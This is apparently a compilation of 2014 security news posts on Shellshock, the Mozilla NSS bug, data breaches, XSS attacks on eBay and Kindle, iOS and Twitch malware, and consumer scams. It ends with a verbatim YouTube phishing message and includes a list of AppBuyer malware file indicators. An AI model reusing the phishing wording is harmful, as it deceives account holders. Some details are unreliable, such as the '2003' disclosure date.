Apple releases bash patch to plug 'Shellshock' security flaw in OS X Mavericks, Mountain Lion, Lion

As promised, Apple on Monday issued OS X bash Update 1.0 for OS X Mavericks, Mountain Lion and Lion, targeting the recently discovered "Shellshock" security flaw originating in the bash UNIX shell.

Following revelations that Shellshock was in the wild, Apple last Friday said that, while most consumers would go unaffected, it was working to patch the problem. That fix was released today for OS X 10.9 Mavericks, OS X 10.8 Mountain Lion and OS X 10.7 Lion.

"This update fixes a security flaw in the bash UNIX shell."

The bug, dubbed "Shellshock" by the computer security community, is theorized to be built in to every version of bash since the system's inception in 1989. A remote attack, nefarious users could potentially issue commands to an affected computer with the intent of gathering information modifying system files and more.

"With OS X, systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services," an Apple spokesperson said last week, adding that the company is "working to quickly provide a software update for our advanced UNIX users."

Mac owners running Mavericks can download the 3.4MB patch through Apple Support website, as can users operating Mountain Lion and Lion. For Mountain Lion, the fix comes in at 34.3MB, while the Lion download clocks in at 3.5MB. Alternatively, the patch is available through Software Update.

What you need to know about Shellshock (a.k.a Bash Bug)

The Shellshock vulnerability (also known as Bash Bug) will have a widespread impact for any organization or user that has Bash enabled on a server, desktop, or device. This includes over 500 million web servers on the Internet today. Shellshock (CVE-2014-6271 and CVE-2014-7169) is found in Bash, the dominant shell for Unix and Linux (default), and can also be found in Mac OS X, some Windows server deployments, and even Android.

It enables remote code injection of arbitrary commands without authentication, which can then allow malicious code execution that could be used to take over an operating system, access confidential data, or set the stage for future attacks.

Simply put, the vulnerability allows attackers to run malicious scripts in systems and servers, which compromises everything in it. It has the potential to do significant widespread damage, since it affects Linux, BSD, and Mac OS X. Linux alone powers a majority of the servers on the Internet and IoT (Internet of Things) devices.

What is the threat extent and who are affected?
Shellshock creates a weak spot that serves as a backdoor for a hacker to carry out commands, take over a machine, dig into servers, steal data and deface websites. Most computers and Internet-enabled home devices such as routers, Wi-Fi radios, and even smart light bulbs running on Linux OS are most likely affected.

Webcams for example, are often Linux-based and these devices can also be hacked and used as infection vectors. This problem extends to smart devices connected to the Internet of Everything, located anywhere and everywhere, including hospitals, energy sectors, and schools. This means even with a minimal vulnerability in a device could open doors for a potential attack.

What can you do?
Be alert and recognize the scope and scale of Shellshock. Whether it’s as notorious as they say or not, having a healthy paranoia can make you more cautious and proactive about interconnected devices that could be vulnerable to possible attacks. Update all firmware and operating systems, and install security updates. Use Shellshock detection tools or plug-ins to scan likely vulnerabilities and exploits. For system admins, patch your systems immediately and closely track your network activity.

Learn more about the Bash Bug on the attached infographic (click to enlarge):

Facebook Messenger has abundance of permissions

Lately, there has been quite a bit of talk about how Facebook Messenger for Android has an abundance of permissions, permissions that may seem out of the spectrum of what a messenger app should need.

Since Facebook no longer allows users to use its flagship Facebook app to send messages, users must now install the new Facebook Messenger app to regain this functionality.

This isn’t the first time questions have risen about Facebook’s long list of permissions. When they first introduced the Facebook app, it came packed with permissions (and it still does).

Let’s first look at the Facebook Messenger app permissions:

In comparison, the Facebook app has all the same permissions, plus Device & app history permissions.

Before you decide to toss Facebook aside and start using Google Hangouts, the messenger for Google Plus, note that it has the same permissions as Facebook Messenger.

The question is whether or not Facebook, Google, or other well-known companies with apps in the Android Play store need the long list of permissions in there apps?

Let’s look at some of the more troubling permissions in Facebook Messenger; location, SMS, Camera/Microphone, and Device ID & call information.

• Location permissions are used to show the location of where you are sending the message from.  It’s arguable whether this is really necessary, but the function is there.
• SMS is being used for when you add a phone number to a Facebook messenger account, it can confirm the phone number being used by sending a confirmation code via text message.
• Camera permissions are so you can use the camera to take a picture to send through messenger, and microphone permissions are used so you can record and send audio.
• Device ID & call information is used to initiate outgoing calls so you can call friends and family through the messenger app.
• In other words, Facebook is NOT tracking your every move, NOT looking at your SMS messages, NOT using your camera and microphone to spy on you, and NOT tracking all your call information.

Facebook and other companies are going to continue to come out with feature rich apps, and the more features they have, the more permissions they will need.

Many of these permissions would be a huge red flag that something fishy might be going on. The difference between good apps and bad apps is how the permissions are used in the code.

It’s the code that contains the malicious intent, but it’s not always easy to tell what permissions are legitimately being used, and which are being exploited.

That’s why we are here to make those hard decisions to keep our customers safe.  So yes, it’s a little scary when apps have an overwhelming list of permissions. This is especially true with social media apps that handle content that some may consider “private”.

One more thing worth mentioning: with all these permissions, you want to make sure you have the correct Facebook Messenger app from the Google Play store.

You’ll know it’s the right one when you see the package name “com.facebook.orca” with a large amount of downloads and reviews.  The package name displayed in the URL on the Google Play site after “id=”.  It would be bad news to get a knock off app with this many permissions from a third-party market.  Stay safe out there.

Cyber attack on Japan Airlines impacts up to 750,000

A phishing attack may have resulted in the theft of personal information belonging to customers of Japan Airlines's frequent flier club.

The leak was due to an 'unauthorised access' to JAL's database by an external server, an airline official told the local news agency Kyodo on Wednesday

The data compromised includes names, addresses, genders and places of work of anywhere between 110,000 and 750,000 members of the program, according to the Japan Times.

Following an investigation – which found that 23 computers contained malware – the airline determined that no credit card or financial information was impacted by the breach. The airline detected the intrusion on Friday and Monday, however, it believes the attacks have gone undetected for more than one month and were introduced to the airline's network via a phishing email.

This incident follows a similar attack on the airline in February, in which hackers penetrated a different program Japan Airlines offers, which allows customers to trade in mileage points for gift coupons.

NEC, Singapore's Economic Development Board partner for cybersecurity training programme

Somehow, I sense that the Government is getting desperate in trying to recruit qualified cyber security personnel at their disposal, thus the collaboration. The partnership comes in the wake of two security breaches in Singapore:

• A telco user flagged a security flaw in telco M1's iPhone 6 pre-order page that resulted in one case of unauthorised access to its customer database.
  
• A group called The Knowns gained access to karaoke entertainment operator K Box's database and published the personal information of more than 317,000 members online.

Nothing wrong with that, in fact I think it is a good news headline to help create cyber security awareness among its citizens. However, I would not pin high hopes for a short 12 month on-the-job-training stint. Very much still depends on how the training is structured, and what kind of experience is gained via the promised training exposure.

==============================================

The Singapore Economic Development Board (EDB) and NEC Corporation will be partnering in a multi-year agreement to build strategic capabilities in cybersecurity through EDB’s Strategic Attachment and Training (STRAT) Programme.

NEC and EDB will seek qualified cybersecurity professionals and graduates to take part in a comprehensive cybersecurity training programme designed to equip them with the needed skills to counter the latest cyber threats.

The training aims to develop key in-depth skills and cybersecurity capabilities in areas of malware analysis, incident response, intrusion detection, digital forensics and vulnerability assessment.

The STRAT Programme aims to build up Singapore's manpower capabilities in strategic areas and sectors through overseas training and attachment with leading companies, and is open to Singaporean citizens and permanent residents.

The one-year programme will involve cybersecurity training locally, as well as with one of NEC’s Security Operations Centres (SOC) in Japan, which will focus on developing cyber operator, analyst and incident responder skills.

Training options also include working at one of NEC’s Regional Competency Centres or at an international partner agency, which will provide on-the-job-training in technical support for cyber operations, cyber forensics and malware analysis. Trainees will also have the option of working at NEC’s research laboratories on research and development projects.

The global shortage of qualified cybersecurity professionals has been highlighted in numerous reports. According to a Mckinsey and World Economic Forum report, delays in adopting cybersecurity capabilities could result in a loss of US$3 trillion (S$3.75 trillion) in economic value by 2020 globally. A global study by Frost & Sullivan highlights that hacking, cyber-terrorism and hactivism are top concerns identified by organizations, yet more than half feel their security organizations are short-staffed.

The signing ceremony for the partnership between EDB and NEC was held at Governmentware 2014 on 24 September 2014, at the Suntec Singapore International Convention & Exhibition Centre.

“Within a year, trainees will get a unique opportunity to acquire skills in different functions of security operations, research and forensics. This wide exposure will be an invaluable experience for trainees as it will equip them to be proficient for the wide range of job roles within the field of cybersecurity," said Gian Yi-Hsen, Director of Safety & Security Industry Programme Office (SSIPO).

“The demand for skilled talent is critical in the current environment, and we are committed to ensuring our identified trainees receive the relevant training that will broaden their exposure and sharpen their skills to counteract the sophisticated cybersecurity challenges of today,” said Tan Boon Chin, Managing Director, Global Safety Division, NEC Corporation.

Source: http://www.channelnewsasia.com/news/business/edb-nec-partner-up-to/1378456.html

Mozilla fixes "phishing friendly" cryptographic bug in Firefox and Thunderbird

Here's a quick note about an important issue!

Mozilla just patched a bug in its cryptographic library, NSS.

NSS stands for Network Security Services, used by Mozilla products such as Firefox (web browsing), Thunderbird (email) and SeaMonkey (both).

All these products have now been patched, including the Firefox Extended Support Release (ESR) verions.

→ As far as I am aware, Google's Chrome and Chromium browsers, as well as Opera, also use NSS.

The bug is rated "critical" because is deals with the validation of digital signatures in TLS connections.

TLS (Transport Layer Security), often also known by its old name of SSL (Secure Sockets Layer), is the cryptographic protocol that puts the S in HTTPS.

When you use HTTPS, it's not just confidentiality you are after, but also integrity (to stop a crook fiddling with the message in transit) and authenticity (to stop a crook claiming to be your bank).

Without certificate validation, you could easily end up conducting a totally secure and unsniffable interaction...

...with a complete imposter.

Unfortunately, this recently-patched NSS vulnerability affects digital signature verification in all the abovementioned products.

Phishing HTTPS logins
Remember that crooks who have hacked into your Wi-Fi access point – at your local coffee shop, for instance – could sneakily redirect any of your HTTPS logins to to phishing sites instead.

Uusally, however, the crooks can't present a digital certificate to vouch for the fake site they have drawn you into.

Sometimes, the crooks avoid the need for digital certificates altogether by dropping back to a plain old HTTP site that doesn't use encryption at all.

You should be able to spot this sort of ruse due to the absence of any security indicators in the address bar of your browser.

Or the crooks could present a TLS certificate that claims to be from your bank, but which isn't vouched for by any recognised certificate authority.

You should be able to spot this sort of ruse due to an "untrusted connection" warning from your browser.

But if there's a cryptographic vulnerability that can be exploited to make a bogus digital certificate seem valid, then the crooks may be able to redirect you to an imposter site without raising any alarms.

And that could lead to the digital theft of your personal information, including usernames and passwords.

Get the latest update

If you have a software product (e.g. Firefox) that uses NSS, make sure you've got the latest update; for Mozilla software, that means (at 2014-09-24T23:45Z):

• Firefox 32.0.3
• Firefox ESR 24.8.1
• Firefox ESR 31.1.1
• Thunderbird 31.1.2
• Thunderbird 24.8.1
• SeaMonkey 2.29.1

For what it's worth, I'm using Firefox 32 on OS X, and the update was so small I didn't get time to read its size during the download.

Applying the update was quick: less than a second to download the patch, and a few more seconds to restart the browser process.

So my recommendation is, "Just do it."

Facebook To Begin Charging Users $2.99 / Month'- Totally BULLSHIT!

Facebook going to charge users per month?? Nobody expected such a news story this week, but it seems that Facebook will No longer be a Free Service, according to reports claimed by the National Report, "Facebook To Begin Charging Users $2.99/mo Starting November 1st", which turns out fake. Thank God !!

This new report is circulating via social media which claims that the social networking giant will begin charging charging $2.99 (€2.33) per month for each user starting November 1, 2014 in an effort to fight against the rising costs the company is facing.

Of course, the claims are simply untrue. Facebook has not announced any such plans to begin charging its users a monthly fee for access to the regular site services that has more than 1.3 billion monthly users.

NICELY FRAMED HOAX

The report comes via the 'satirical' fake-news website, which is a complete Hoax, just like many similar 'Facebook to start charging' hoaxes before it. But What make it different from those other hoaxes?? It’s the way it framed so nicely that it acquired everybody's attention on the the Internet.

“At a press conference this morning, Facebook rolled out their monthly service plan which begins November 1st of this year. The social media giant says they will start charging members $2.99/mo to use the services that the site has to offer,” reads the fake news report.

Not just this, the fake-news article also quoted some fake statements from Facebook CEO Mark Zuckerberg, which made it even more convincing.

“After thinking long and hard about this decision, at the end of the day, we were forced to add this monthly fee,” said Facebook founder and CEO Mark Zuckerberg. “If we don't do something about our rising costs now, Facebook could cease to exist in the near future.”

FACEBOOK IS FREE AND ALWAYS WILL BE

National Report considers itself as Satirical, as in its disclaimer, the site mentioned that it is a news and political satire web publication, which may or may not use real names, sometimes in semi-real or wholly fictitious ways. Although many are confused about this because there are so many fake news that are making their way out of the site and are believed to be true.

The site also reads that every news article on their website is fiction and fake news, which do not relate with the truth in any way. But, the fact that the site presents their news in a manner similar to that of other legitimate news websites makes things much more difficult to distinguish.

For those who believe this story to be true are informed, regardless of all claims that Facebook is about to start charging, that these claims are totally nonsense. Facebook isn’t charging its users for their services, and according to their own homepage, it says, 'It's free and always will be'.

Always take a while to verify these kind of sensational claims regarding Facebook or any other online services. also, don't spread any misinformation and junk with your Facebook friends, before confirming the whole thing.

iPhone 6 Launches Millions of Scam Messages

The new iPhone 6 has gone on sale around the world, sparking long lines and campouts, and a whole lot of buzz. Unsurprisingly, internet scammers quickly took advantage of the frenzy to distribute their wares.

Immediately following the unveiling of the new iPhone 6 and iPhone 6 plus, scammers accordingly began circulating email and web scams attempting to capitalize on its popularity. The gambits however take many forms.

For instance, Hoax-Slayer uncovered a bogus Facebook competition offering the ability to “win a new iPhone 6 by carrying out three easy steps.” To get a chance to win, the site claims that users must first like the site's Facebook Page and then further promote the site by sharing a link with Facebook friends. They are then instructed to go to a second page on the site to download a ‘Participation Application.’ But, a pop-up window will direct users to a list of links that open third-party survey websites.

And here’s where the real malicious activity starts: many of these ask users to submit their mobile number, which, in turn, will subscribe them to a premium SMS service that charges several dollars every time the scammers send the victim a message.

Others collect names, addresses and phone details, which can be used for a variety of nuisance campaigns.

“Meanwhile, the scammer who created the fake promotion will earn a commission via a suspect affiliate marketing scheme each time you fill in a survey and provide your details,” Hoax-Slayer explained. “And, each time you return to the download page, the pop-up will inform you that the survey was not completed properly or there was a 'small error'. You will be urged to participate in yet another survey. But, no matter how many surveys you complete, you will still not get to download your 'application'.”

In one of the many other campaigns, spammers are using an iPhone 6 giveaway email to lure in potential victims; they are asked to follow instructions in the email to click on a link to, yet once again, a survey, but instead, an adware install will commence. Since Sept. 12, AppRiver researchers have seen nearly 1 million messages associated with this specific campaign.

“Adware is a form of software that is meant to generate revenue for its author by automatically displaying advertisements,” explained AppRiver researcher Troy Gill, in a blog. “Adware is not typically anything more than an annoyance but can often seriously infringe on users' privacy. This particular strain has a wide array of functionality and can make a victim’s web browsing experience fairly miserable.”

These types of scams, of course, also carry the possibility of malicious activity in the form of man-in-the-middle attacks, malware deployments and phishing.

“Though its presence is not secret, it is quite good at embedding itself into the victim’s system and can be quite difficult for the average user to remove,” Gill said. “Remember, advertisements promising you something for nothing are almost always too good to be true.”

eBay Falls Victim to Cross-Site Scripting Attack

The British website of online retailer eBay was compromised through a cross-site scripting (XSS) vulnerability, exploited to steal customers’ login credentials, according to the BBC.

Attackers apparently planted malicious Javascript code in product listings to redirect eBay customers interested in cheap Apple smartphones to a spoofed eBay welcome page. Once there, they were asked to enter their account username and password.

The incident was first reported by Paul Kerr, an IT worker from Scotland who contacted eBay and was told that the matter would be considered “of the highest level of security”.

However, the company was criticized for its 12-hour response time in fixing the issue.

“eBay is a large company and it should have a 24/7 response team to deal with this – and this case is unambiguously bad,” said Steven Murdoch from University College London’s Information Security Research Group.

In a statement, the retailer said the issue only affected one item listed on the UK site, information questioned by the BBC.

“This report relates only to a ‘single item listing’ on eBay.co.uk whereby the user has included a link which redirects users away from the listing page,” a spokesperson said. “We take the safety of our marketplace very seriously and are removing the listing as it is in violation of our policy on third-party links.”

Download this Kindle eBook, and have your Amazon account cookies stolen

A security researcher has reported what appears to be an embarrassing flaw on Amazon’s website that could put Kindle users at risk.

Benjamin Daniel Mussler claims that the “Manage Your Content and Devices” and “Manage Your Kindle” services on Amazon’s web-based Kindle Library are vulnerable to a cross-site scripting (XSS) attack, which can be exploited by a boobytrapped eBook title.

Anyone wanting to target a Kindle user would go about go about their attack by creating an eBook with a specially-crafted title:

When the boobytrapped eBook is added to the intended victim’s library, the code will be automatically executed when the Kindle Library webpage is opened.

According to Mussler this means that “Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised”.

The good news is that you’re unlikely to find an eBook with a maliciously-crafted title in the official Kindle eBook store, provided Amazon keeps its eyes open. Instead, the only real chance that you might fall victim to the vulnerability is if you pirate eBooks, downloading them from dodgy sources and use Amazon’s “Send to Kindle” service to have them accessible on your reader.

The bad news, however, is that Mussler says he first reported the vulnerability to Amazon in November 2003 – along with an example eBook that ran proof-of-concept eBook that grabbed cookies and sent them to him. Amazon’s technical team managed to fix the flaw within four days. 

Most people would consider that a reasonable response, and a job well done… but there is more to this story.

To Mussler’s shock, the very same vulnerability was introduced approximately two months ago, and currently remains unfixed. The researcher informed Amazon that the security hole has re-emerged, but received no response from the company.

For that reason, Mussler has decided to go public with his findings and even published example code on his website that allows anyone to replicate the vulnerability.

Whether you think public disclosure of the vulnerability was the right approach or not is a matter of some debate. One thing is clear, however. Amazon needs to fix the security hole, even if it is only likely to be a risk for a small number of Kindle users, and fix it permanently.

In the meantime, Kindle users are advised to get their eBooks from official stores – just to be on the safe side.

AppBuyer iOS Malware Steals Apple ID, Password & Buys Apps

Researchers from Palo Alto networks have discovered an iOS malware sample that affects iPhone devices that are jailbroken. The malware is named ‘AppBuyer’.

Photo: blvdone / Shutterstock

The AppBuyer malware is created and set up in a way that it will steal the user’s Apple ID login and password. Once these credentials have been stolen, the malware will purchase specific applications from the App Store and those behind the malware are utilizing the iOS environment to make some serious money.

The hackers first infect the device, and when it has been hacked, the device uploads Apple ID credentials. Once the hackers have access to the credentials, they are able to buy specific applications that may generate attractive revenue for the hackers.

The members of the WeiPhone Technical Group, who first mentioned AppBuyer in May, remotely assisted a user in finding out why some apps were periodically installed to his jailbroken device, and later found two strange files on the phone.

They discovered that the suspicious files would execute, download and delete other executable files from the web. They also tried to identify the hacker through analyzing the C&C server’s domain name with the samples. They also released samples for downloading.

WeiPhone Technical Group didn’t give a reason for how the samples were installing other apps into infected devices. On the other hand, the C&C servers are up and running, which may impact a greater number of users.

Palo Alto Networks analyzed the samples to disclose its working and provide suggests and solutions to defeat it. The researchers, however, still don’t know how the malware was installed on jailbroken Apple devices.

There are some possibilities that include via a malicious Cyber Substrate tweak that is hosted in third-party Cydia sources, through a PC jailbreaking utility, through other PC malware, or some other unknown way possibly.

After a device has been infected, the malware will first download executable files to generate a unique UDID. Then it will download a Cydia Substrate tweak for intercepting all HTTPS/HTTP sessions for stealing the Apple ID and password of the user and uploading to the attacker’s server.

Lastly, it will download a fake gzip utility that will login to the App Store through the user’s Apple ID credentials, and buy additional apps. Palo Alto Networks researchers, therefore, identify AppBuyer as a Trojan.

Defense

Palo Alto Networks researchers highly recommend iOS users to stay away from jailbreaking. They mention AdThief, another iOS malware discovered this year, infecting more than 75,000 devices. Another example is Unflod, a malicious Cydia Substrate tweak that steals the Apple ID credentials of the victim in a similar way.

For users who have already jailbroken their iOS devices should look for one or a combination of the following files in their device file system:

• /System/Library/LaunchDaemons/com.archive.plist
• /bin/updatesrv
• /tmp/updatesrv.log
• /etc/uuid
• /Library/MobileSubstrate/DynamicLibraries/aid.dylib
• /usr/bin/gzip

If there is any such file, the device may be infected by AppBuyer malware. However, just removing these files may not solve the issue as there is no word on how the malware actually got into the device. The Palo Alto Networks Platform says it can protect the malware in several ways.

They have already released signature URLs to prevent the download of the mentioned malicious files, and soon they will be releasing IPS and DNS signatures. The new iOS malware can be essentially deleted by blocking AppBuyer’s executable files from downloading. 

Leaked: K Box Singapore database with more than 317,000 names

Police report filed after database including personal details, such as contact numbers and date of birth, was made available for public download.

Personal details of more than 317,000 members of Karaoke entertainment operator K Box Singapore appear to have been leaked publicly.

At 4.17am on Tuesday morning (Sep 16), a group calling themselves The Knowns emailed links to the list of members' details to several media outlets, including MediaCorp.

The list includes names of K Box members as well as their contact numbers, email addresses, NRIC numbers, dates of birth and marital status. It also includes K Box-specific data, such as membership numbers and "K Points" earned.

Channel NewsAsia has been able to verify the details of several of the individuals on the list. One member, who confirmed her details in the list were accurate, said that K Box has not yet contacted her about any leak.

"I'm a bit freaked out," said the member, who asked to remain anonymous. "My main concern is that with those details, someone could sign me up for random stuff."

Another member whose name was found on the list said he was "extremely concerned what other personal information got leaked" and that he was also worried if other companies' databases had been hacked. He filed a police report reporting the leak on Tuesday afternoon.

The Police confirmed that the report has been lodged, and that they are looking into the matter.

K Box did not respond to phone or email queries from the media. A senior management staff at the company headquarters said the company had "no comment" on the issue.

Channel NewsAsia understands that the relevant government agencies are aware of the incident and are looking into it.

The group claiming responsibility for the leak said that it was in response to "the recent increase in toll at Woodlands", saying that it was "an unnecessary financial burden on working Malaysians".

"To show our displeasure, we are releasing the database of Kbox containing more than 300k personal details of its membership. We had done it before and will do it again."

Apple relents, lets you "depurchase" that U2 album you never bought in the first place‏

Someone at Apple must be listening!

The company offered every iTunes user (let's call that half a billion people) a free copy of U2's latest album.

Largesse, swag, booty, a tchotchke, call it what you will.

U2's Songs of Innocence was a global freebie annnounced at Apple Live 2014, Apple's annual product launch extravaganza.

In fact, getting the free album turned out to be an offer so good that you simply couldn't refuse.

And when I say that, I'm not being metaphorical.

You literally couldn't refuse, because the product was automatically clocked up as one of your iTunes purchases and downloaded to your device.

By default (unless you had turned on an iTunes feature called Automatic Downloads), the actual music data itself wasn't pushed to your iPhone.

But the album and its track list arrived automatically:

Strictly speaking, clicking to listen to a song for the first time meant clicking to download-and-listen, but that's a somewhat pedantic distinction, almost like the difference between double-clicking and single-clicking to open an email attachment.

Opinions were strongly divided.

One Naked Security reader told us:

"Hey, it's a gift so stop the ridiculous fussing. 
If you don't want it just don't download it. OK? 
My goodness all these desperate, angst-inspiring First World problems."

Another took the middle ground:

"The problem is Apple seem to have such brand power over their customers 
that arrogance is creeping into their marketing.

Still, as others have pointed out, 
at least it wasn't Justin Bieber."

But one commenter wondered aloud, "Where does this sort of stunt end?"

"Today it's the next U2 album. 
Tomorrow it's a piece of propaganda on your Kindle. 
The next day it's an app so Big Brother can watch you."

The album certainly wasn't opt-in, because it turned up without even asking you.

But there were all sorts of problems that meant it wasn't even really opt-out, either.

For example, you could left-swipe on each song to reveal a button labelled Delete.

Except that you had to listen to the song first.

You could hide the album in iTunes, so you'd still own it, and still be a statistic in the biggest album release ever; you just wouldn't see the album (or end up with it in some randomly chosen playlist).

You couldn't, it seems, disown, unbuy or depurchase it.

Until now.

Apple has listened, and come up with a free Album Removal Tool, though this part isn't automatic: you have to opt in to opting out:

In fact, if you remove the album now, then from 13 October 2014 onwards, you really will be able to purchase it.

Bono would approve; after all, he told TIME Magazine that he "[doesn't] believe in free music."

New malware spreads over Twitch chat, targets Steam accounts

If you use gaming video streaming site Twitch, you’ll want to be careful what you click on. A new piece of malware spread through Twitch’s chat feature will attempt to bleed your Steam account dry, according to security software maker F-Secure.

The malware spreads through messages posted to Twitch chat that try to entice users into entering a weekly raffle. Click on the link, and a Java program will open up a phony raffle entry form.

Once you fill out and submit the form (which, according to F-Secure, doesn’t actually get sent anywhere), the malware goes to work. It installs and runs a Windows binary that can gain access to your Steam account and add friends, accept friend requests, trade items, and sell items in the market at a discount.

As a result, the malware can “wipe your Steam wallet, armory, and inventory dry,” according to F-Secure, and sell your items at a discount on the Steam Community Market. The idea here is that the attacker can sell uninteresting items from your account, then buy themselves more interesting items. Shady.

Since this all happens on your system, it bypasses Steam’s security measures to prevent others from logging into your account on another PC. F-Secure recommends that Steam add new security measures “for those trading several items to a newly added friend and for selling items in the market with a low price based on a certain threshold.” 

Massive “Gmail Credentials” Dump Posted Online

Another day, another large haul of logins posted to the web. 

While the linked article sounds a bit scary with mentions of a “big security breach” for Gmail, that isn’t the case here and there’s no need to run screaming for the hills just yet. 

What actually appears to have happened is that somebody rolled up lots of older data dumps originating from various causes (such as phishing and / or password reuse) and released it all in one go, posting it to a Bitcoin forum. 

As these logins could give scammers access to Gmail should the email and passwords match up, Google took a look at the data and the results are as follows:

• Less than 2% of what is claimed to be close to 5 million account credentials “might” have worked, and their automated detection systems would have “blocked many of those login attempts.”
• Enabling the various security tools on offer from Google will help to bump up the security level on your accounts and services. Passwords, recovery options, 2 step verification – all of these are available to you.
• These leaked accounts were not the result of a breach of Google systems.

The popular Haveibeenpwned site, run by well-known software architect and Microsoft MVP Troy Hunt – which lets visitors check if their username or email address (NOT password) have appeared in any data breaches – has been updated to reflect this latest data dump.

It seems 17% of the accounts were already in there to begin with. If you’re wanting to keep up with the latest stats, figures and “Where has this data been seen before” you should keep an eye on that particular Twitter account as it promises to be a busy few days.

Otherwise, don’t panic and have a look at your security settings sooner rather than later. You’ll likely be glad you did.

'Apple Pay' is a Touch ID-based mobile wallet included with iPhone 6, rolls out in October

Apple will enter the mobile payment space in a big way with this month's launch of the iPhone 6 and iPhone 6 Plus, both of which will ship with integrated near-field communications technology to allow secure wireless payments through a service called Apple Pay.

In unveiling Apple Pay, Apple Chief Executive Tim Cook noted that current credit cards are not secure, featuring exposed numbers and "outdated and vulnerable" magnetic stripes. Apple Pay aims to solve this by securely holding banking and card information on a user's iPhone 6 or iPhone 6 Plus.

In showcasing Apple Pay, Apple executive Eddy Cue noted that the company won't know what the user bought, how they bought it, or how much they paid for it. The details of the transaction are entirely between a user and their bank.

Apple has partnered with American Express, MasterCard and Visa for digital debit cards and credit cards. In addition, the six biggest issuing banks in the U.S. are on board, representing 83 percent of credit card volume in the U.S.

The new system will work with 220,000 locations that allow contact-less payments. And Apple says its method is more secure because cashiers don't get to see a customer's name, credit card number or security code.

Apple Pay will launch in the U.S. next month, though Apple is planning to roll out in more countries soon.

Apple just added another layer of iCloud security, a day before iPhone 6 event

Apple said it was beefing up security after last week's nude celebrity hack, and now it looks like the company is following through on its promise. MacRumors is reporting that the company has begun sending out alert emails whenever iCloud accounts are accessed through a web browser. Notably, the alerts aren't triggered when the service detects a new browser; they are sent even when the specific browser has already been used to access the account.

Because iCloud is typically used to link apps, browser logins are now being treated as unusual enough to warrant an alert by themselves.

These alerts wouldn't prevent hacks, but they would provide an earlier indication that an account had been compromised, making it easier to stop hacks in progress and potentially trace back whoever is trying to break into the account. It's also an important sign that Apple is turning new attention to iCloud, which has many in the industry have seen as a neglected part of Apple's otherwise seamless infrastructure.

It's also an interesting move in the run up to Apple's event tomorrow, which many expect will bring new 
features to iCloud.

Review your Facebook privacy settings with Privacy Checkup

Facebook's Privacy Checkup tool - informally dubbed "Privacy Dinosaur" - has been made available for use to all users of the popular social network.

Initially introduced and tested in April by a small number of user, the tool has obviously passed muster, and the rest of the users will soon be prompted to try it out via a pop-up.

Or, they could test it right away, by clicking on the padlock icon in the top right corner of their Facebook page and choosing the (unmissable) option.

In three steps, the tool will invite you to review and change the default setting determining who will see your posts, the settings for the apps you've logged into with Facebook, and personal information you have included in your profile.

The tool is extremely easy to use and doesn't overwhelm users with information, and will hopefully give them a push towards reviewing all their privacy setting and learning more about them.

One might wonder why, after years of pushing users to share more info publicly, Facebook has now started worrying about user privacy?

It's likely that Facebook is trying to rehabilitate its image with the greater public, and make users who worry about privacy continue to share useful data.

Earlier this year, at the F8 developers conference, the company announced that users who are worried about data collected via apps will soon be offered the choice to login to third-party apps anonymously.

Facebook is apparently after user numbers and data, but for themselves. The company is reportedly working on a mobile ad network similar to Google's, as it's looking to get a bigger cut of the ad revenue.

Nude Celebrity Photo Dump Has Many Asking What Happened

Hundreds of private photos belonging to several high-profile Hollywood actresses were posted online this past weekend. They are explicit in nature, and were not intended to be seen by the public. But they have been.

The question, now, is how did this happen?

The details of the hackings haven’t been worked out quite yet, but there are two popular theories floating around: the first is that the hacker, or hackers, exploited a vulnerability allowing cybercriminals to make an unlimited number of password guesses on Apple’s cloud service offering, iCloud. This type of attack—repeatedly guessing passwords until the successful password is found—is called a brute force attack, and is typically done with an automated program. Once an iCloud account is breached, or any cloud service for that matter, the hackers can view and retrieve anything saved in that cloud such as contacts, photos, saved notes, and more.

The second theory, one suggested by Apple after it made an official statement on the situation, is that these celebrities may have fallen victim to a social engineering attack. Social engineering attacks are attacks that take advantage of social habits in order to compromise an account or gain access to sensitive information. For example, a “hacker” could pose as someone who works at your company, but in a different department, in order to trick you into giving up sensitive company information. This wouldn’t be the first time that a social engineering attack made headlines. In 2012, digital journalist Mat Honan had his life turned upside down when hackers gained access to nearly all of his online accounts through social engineering techniques.

Regardless of which theory is accurate, the result is fairly predictable: someone involved with the hacking ring, or the single person who accrued all of these photos, wanted to show off on an Internet imaging board and posted stolen photos. Those photos, of course, were shared throughout the Web, and the privacy of these well-known individuals was shattered.

We won’t know what hacking method was used for some time, possibly not until after an F.B.I. investigation. That investigation won’t restore anyone’s lost privacy, but it’ll hopefully result in some much-needed justice. In the meantime, what can people do in order to protect themselves from such attacks?


Of course, with celebrities being in the public eye, the demand for their personal photos is quite high. Still, while you may not be a celebrity, there are a few important steps that you can take to protect your online identity, and your private photos.

• Be wary of uploading to the cloud. By default, iPhones upload photos to iCloud through a feature called “Photo Stream.” This is done to preserve your photos in the event of phone failure, and enable you to access photos from any of your devices. In this context, however, having personal photos in multiple places only increases the likelihood of those photos leaking. If you feel that you need to disable Photo Stream, follow Apple’s instructions here.

• Be careful what photos you take with your mobile device. Even if you’re not sending them to anyone or uploading to the cloud, do remember that your phone or tablet can be lost or stolen. 

• Use strong passwords. Every online service requires the use of a password. These passwords need to be complex in order to ensure your security. A complex password consists of at least eight characters in length and uses a combination of upper and lower case letters, numbers and symbols. These passwords should be unique to each site and should be changed every six months at a minimum.

• Use a password manager. The reason why strong passwords aren’t used enough is largely attributed to the fact that they’re more difficult to remember. Complex passwords can also be a pain to use on mobile devices.

• Enable two-factor authentication wherever possible. Two-factor authentication is a security standard that requires the account holder to possess two things: knowledge (like a password or answer to security questions) and something that only they would have (like a phone number). Two-factor authentication is a great way of preventing hackers from gaining access to sensitive accounts, and would’ve likely prevented this whole situation from taking place if enabled.

Be warned: there is no one silver bullet to digital security. Vulnerabilities exist because of how programs are built and how they interact with one another. The best way to stay secure online to stay knowledgeable of security defense and use the techniques you need to stay safe surfing.

“YouTube Account Manager has sent you a Message…”

We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:

YouTube account manager has sent you a message

We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.

Please follow the following instructions to recover your account:

1. Please contact your account manager here: [url]

2. You have to complete a quick survey to make sure you are human.

3. Wait for our email explaining the next steps.

* If you decide to ignore this message and not follow the above steps your account will be suspended.

